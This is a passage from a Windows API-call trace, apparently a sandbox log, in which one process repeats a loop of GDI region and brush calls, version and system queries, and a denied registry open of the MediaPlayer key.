hrgnSrc2=0x900401d6, iMode=1) returned 1 [0088.342] CombineRgn (hrgnDst=0x104153a, hrgnSrc1=0x920401d3, hrgnSrc2=0x900401d6, iMode=4) returned 2 [0088.342] CreateSolidBrush (color=0xff) returned 0x2101538 [0088.342] CreateSolidBrush (color=0xff0000) returned 0x110153b [0088.342] DeleteObject (ho=0x110153b) returned 1 [0088.342] DeleteObject (ho=0x900401d6) returned 1 [0088.342] DeleteObject (ho=0x920401d3) returned 1 [0088.342] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.342] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.342] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.342] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.342] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.342] BeginPath (hdc=0x0) returned 0 [0088.342] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.342] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.342] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.342] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.343] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.343] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.343] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.343] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.389] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x910401d6 [0088.389] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x930401d3 [0088.389] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041abe [0088.390] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041abf [0088.390] CombineRgn (hrgnDst=0x1041abe, hrgnSrc1=0x910401d6, hrgnSrc2=0x930401d3, iMode=1) returned 1 [0088.390] CombineRgn (hrgnDst=0x1041abf, hrgnSrc1=0x910401d6, hrgnSrc2=0x930401d3, iMode=4) returned 2 [0088.390] CreateSolidBrush (color=0xff) returned 0x210153b [0088.390] CreateSolidBrush (color=0xff0000) returned 0x1101ac0 [0088.390] DeleteObject (ho=0x1101ac0) returned 1 [0088.390] DeleteObject (ho=0x930401d3) returned 1 [0088.390] DeleteObject (ho=0x910401d6) returned 1 [0088.390] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.390] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.390] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.390] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.390] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.390] BeginPath (hdc=0x0) returned 0 [0088.390] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.390] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.390] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.390] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.390] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.390] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.390] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.390] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.390] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x940401d3 [0088.390] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x920401d6 [0088.390] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ac1 [0088.390] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ac2 [0088.390] CombineRgn (hrgnDst=0x1041ac1, hrgnSrc1=0x940401d3, hrgnSrc2=0x920401d6, iMode=1) returned 1 [0088.391] CombineRgn (hrgnDst=0x1041ac2, hrgnSrc1=0x940401d3, hrgnSrc2=0x920401d6, iMode=4) returned 2 [0088.391] CreateSolidBrush (color=0xff) returned 0x2101ac0 [0088.391] CreateSolidBrush (color=0xff0000) returned 0x1101ac3 [0088.391] DeleteObject (ho=0x1101ac3) returned 1 [0088.391] DeleteObject (ho=0x920401d6) returned 1 [0088.391] DeleteObject (ho=0x940401d3) returned 1 [0088.391] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.391] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.391] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.391] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.391] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.391] BeginPath (hdc=0x0) returned 0 [0088.391] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.391] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.391] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.391] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.391] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.391] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.391] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.391] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.391] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x930401d6 [0088.391] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x950401d3 [0088.391] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ac4 [0088.391] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ac5 [0088.391] CombineRgn (hrgnDst=0x1041ac4, hrgnSrc1=0x930401d6, hrgnSrc2=0x950401d3, iMode=1) returned 1 [0088.391] CombineRgn (hrgnDst=0x1041ac5, hrgnSrc1=0x930401d6, hrgnSrc2=0x950401d3, iMode=4) returned 2 [0088.391] CreateSolidBrush (color=0xff) returned 0x2101ac3 [0088.391] CreateSolidBrush (color=0xff0000) returned 0x1101ac6 [0088.391] DeleteObject (ho=0x1101ac6) returned 1 [0088.391] DeleteObject (ho=0x950401d3) returned 1 [0088.392] DeleteObject (ho=0x930401d6) returned 1 [0088.392] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.392] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.392] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.392] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.392] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.392] BeginPath (hdc=0x0) returned 0 [0088.392] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.392] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.392] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.392] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.392] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.392] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.392] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.392] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.392] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x960401d3 [0088.392] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x940401d6 [0088.392] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ac7 [0088.392] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ac8 [0088.392] CombineRgn (hrgnDst=0x1041ac7, hrgnSrc1=0x960401d3, hrgnSrc2=0x940401d6, iMode=1) returned 1 [0088.392] CombineRgn (hrgnDst=0x1041ac8, hrgnSrc1=0x960401d3, hrgnSrc2=0x940401d6, iMode=4) returned 2 [0088.392] CreateSolidBrush (color=0xff) returned 0x2101ac6 [0088.392] CreateSolidBrush (color=0xff0000) returned 0x1101ac9 [0088.392] DeleteObject (ho=0x1101ac9) returned 1 [0088.392] DeleteObject (ho=0x940401d6) returned 1 [0088.392] DeleteObject (ho=0x960401d3) returned 1 [0088.392] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.392] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.393] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.393] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.393] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.393] BeginPath (hdc=0x0) returned 0 [0088.393] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.393] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.393] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.393] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.393] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.393] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.393] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.393] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.393] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x950401d6 [0088.393] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x970401d3 [0088.393] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041aca [0088.393] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041acb [0088.393] CombineRgn (hrgnDst=0x1041aca, hrgnSrc1=0x950401d6, hrgnSrc2=0x970401d3, iMode=1) returned 1 [0088.393] CombineRgn (hrgnDst=0x1041acb, hrgnSrc1=0x950401d6, hrgnSrc2=0x970401d3, iMode=4) returned 2 [0088.393] CreateSolidBrush (color=0xff) returned 0x2101ac9 [0088.393] CreateSolidBrush (color=0xff0000) returned 0x1101acc [0088.393] DeleteObject (ho=0x1101acc) returned 1 [0088.393] DeleteObject (ho=0x970401d3) returned 1 [0088.393] DeleteObject (ho=0x950401d6) returned 1 [0088.393] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.393] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.393] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.393] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.393] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.393] BeginPath (hdc=0x0) returned 0 [0088.393] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.394] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.394] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.394] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.394] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.394] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.394] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.394] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.394] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x980401d3 [0088.394] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x960401d6 [0088.394] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041acd [0088.394] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ace [0088.394] CombineRgn (hrgnDst=0x1041acd, hrgnSrc1=0x980401d3, hrgnSrc2=0x960401d6, iMode=1) returned 1 [0088.394] CombineRgn (hrgnDst=0x1041ace, hrgnSrc1=0x980401d3, hrgnSrc2=0x960401d6, iMode=4) returned 2 [0088.394] CreateSolidBrush (color=0xff) returned 0x2101acc [0088.394] CreateSolidBrush (color=0xff0000) returned 0x1101acf [0088.394] DeleteObject (ho=0x1101acf) returned 1 [0088.394] DeleteObject (ho=0x960401d6) returned 1 [0088.394] DeleteObject (ho=0x980401d3) returned 1 [0088.394] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.394] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.394] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.394] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.394] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.394] BeginPath (hdc=0x0) returned 0 [0088.394] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.394] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.394] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.394] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.394] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.394] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.395] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.395] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.395] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x970401d6 [0088.395] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x990401d3 [0088.395] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ad0 [0088.395] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ad1 [0088.395] CombineRgn (hrgnDst=0x1041ad0, hrgnSrc1=0x970401d6, hrgnSrc2=0x990401d3, iMode=1) returned 1 [0088.395] CombineRgn (hrgnDst=0x1041ad1, hrgnSrc1=0x970401d6, hrgnSrc2=0x990401d3, iMode=4) returned 2 [0088.395] CreateSolidBrush (color=0xff) returned 0x2101acf [0088.395] CreateSolidBrush (color=0xff0000) returned 0x1101ad2 [0088.395] DeleteObject (ho=0x1101ad2) returned 1 [0088.395] DeleteObject (ho=0x990401d3) returned 1 [0088.395] DeleteObject (ho=0x970401d6) returned 1 [0088.395] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.395] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.395] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.395] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.395] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.395] BeginPath (hdc=0x0) returned 0 [0088.395] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.395] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.395] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.395] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.395] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.395] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.395] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.395] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.396] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9a0401d3 [0088.396] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x980401d6 [0088.396] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ad3 [0088.396] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ad4 [0088.396] CombineRgn (hrgnDst=0x1041ad3, hrgnSrc1=0x9a0401d3, hrgnSrc2=0x980401d6, iMode=1) returned 1 [0088.396] CombineRgn (hrgnDst=0x1041ad4, hrgnSrc1=0x9a0401d3, hrgnSrc2=0x980401d6, iMode=4) returned 2 [0088.396] CreateSolidBrush (color=0xff) returned 0x2101ad2 [0088.396] CreateSolidBrush (color=0xff0000) returned 0x1101ad5 [0088.396] DeleteObject (ho=0x1101ad5) returned 1 [0088.396] DeleteObject (ho=0x980401d6) returned 1 [0088.396] DeleteObject (ho=0x9a0401d3) returned 1 [0088.396] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.396] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.396] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.396] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.396] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.396] BeginPath (hdc=0x0) returned 0 [0088.396] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.396] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.396] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.396] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.396] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.396] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.396] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.396] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.396] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x990401d6 [0088.396] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9b0401d3 [0088.396] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ad6 [0088.396] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ad7 [0088.396] CombineRgn (hrgnDst=0x1041ad6, hrgnSrc1=0x990401d6, hrgnSrc2=0x9b0401d3, iMode=1) returned 1 [0088.396] CombineRgn (hrgnDst=0x1041ad7, hrgnSrc1=0x990401d6, hrgnSrc2=0x9b0401d3, iMode=4) returned 2 [0088.397] CreateSolidBrush (color=0xff) returned 0x2101ad5 [0088.397] CreateSolidBrush (color=0xff0000) returned 0x1101ad8 [0088.397] DeleteObject (ho=0x1101ad8) returned 1 [0088.397] DeleteObject (ho=0x9b0401d3) returned 1 [0088.397] DeleteObject (ho=0x990401d6) returned 1 [0088.397] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.397] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, 